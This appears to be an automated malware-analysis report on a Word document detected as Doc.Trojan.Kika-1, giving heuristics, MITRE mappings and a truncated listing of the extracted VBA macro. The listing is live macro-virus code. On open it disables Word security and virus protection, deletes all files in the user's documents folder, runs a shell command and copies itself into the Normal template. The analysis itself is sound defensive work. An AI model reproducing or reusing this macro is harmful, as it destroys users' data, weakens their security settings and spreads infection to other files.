Verdict: MALICIOUS
Risk Score: 220

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1059 Command and Scripting Interpreter
The critical OLE_VBA_SHELL heuristic indicates the presence of a Shell() call within the VBA macros. The Document_Open macro is configured to execute automatically, and it attempts to disable security features and delete files. The ClamAV detection 'Doc.Trojan.Kika-1' further supports the malicious nature of the file. The macro also attempts to clear existing code and rename components, suggesting a self-propagation or obfuscation mechanism.
Heuristics (5)

- ClamAV: Doc.Trojan.Kika-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Kika-1
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6023 bytes |

SHA-256 of macros.bas: 2490837dfbf29698cfd9dd2cc45b3e1dff58984a9b7b5ae6cc326329c48abf0d
Script preview (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "KIKA"
Attribute VB_Base = "1Normal.KIKA"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Application.ShowVisualBasicEditor = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\security", "Level") = 1&
CommandBars("Tools").Controls("Macro").Visible = False
Options.VirusProtection = (1 - 1)
Options.ConfirmConversions = (1 - 1)
Options.SaveNormalPrompt = False
Application.EnableCancelKey = wdCancelDisabled
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\", "kikaviruz") <> "by BAMBAM" Then
Kill ("c:\Mis documentos\*.*")
Kill ("C:\My documents\*.*")
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\", "kikaviruz") = "by BAMBAM"
Set FRED = ActiveDocument.VBProject.VBComponents.Item(1)
Set PETER = NormalTemplate.VBProject.VBComponents.Item(1)
Shell ("LABEL C: KIKA"), vbMinimizedNoFocus
BETY = PETER.Codemodule.CountOFlines
BILMA = FRED.Codemodule.CountOFlines
bambam = 2
If FRED.Name <> "KIKA" Then
If BILMA > 0 Then FRED.Codemodule.Deletelines 1, BILMA
Set Ainfectar = FRED
FRED.Name = "KIKA"
hacerAD = True
PEBELLS = PEBELLS + (Chr(65 + Int(Rnd * 26)))
End If
If PETER.Name <> "KIKA" Then
If BETY > 0 Then PETER.Codemodule.Deletelines 1, BETY
Set Ainfectar = PETER
PETER.Name = "KIKA"
hacerNT = True
PEBELLS = PEBELLS + (Chr(65 + Int(Rnd * 22)))
End If
If hacerNT <> True And hacerAD <> True Then GoTo byebye
If hacerNT = True Then
Do While FRED.Codemodule.Lines(1, 1) = ""
FRED.Codemodule.Deletelines 1
PEBELLS = PEBELLS + (Chr(65 + Int(Rnd * 22)))
Loop
Ainfectar.Codemodule.AddFromstring ("Private Sub Document_Close()")
Do While FRED.Codemodule.Lines(bambam, 1) <> ""
Ainfectar.Codemodule.insertlines bambam, FRED.Codemodule.Lines(bambam, 1)
bambam = bambam + 1
Loop
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("Sub ViewVbCode()")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("On Error Resume Next")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("MsgBox ") + (Chr(34) + "Its KIKA VIRUZ Ja,ja,ja... : )" + Chr(34)) + "," + "vbokoNLY," + Chr(34) + "Alt-F11 hmmm..." + Chr(34)
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("End Sub")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("Sub HelpAbout()")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("On Error Resume Next")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("MsgBox ") + ((Chr(34) + "Sorry " + (Chr(34)) + "+" + "Application.UserName" + "+" + (Chr(34)) + ", but... you have KIKA VIRUZ by BAMBAM. (c)copywrong. " + Chr(34)))
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("End sub")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("Sub ToolsMacro()")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("On Error Resume Next")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("MsgBox") + (Chr(34)) + "I know you " + (Chr(34) + "+" + "application.username" + "+" + Chr(34) + " and i'm observing you " + Chr(34))
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("End Sub")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("Sub FileTemplates()")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("On Error Resume Next")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("End Sub ")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("Sub help()")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("On error resume next")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, ("Assistant.Visible = True")
bambam = bambam + 1
Ainfectar.Codemodule.insertlines bambam, (" With Assistant.NewBalloon")
```

... (truncated)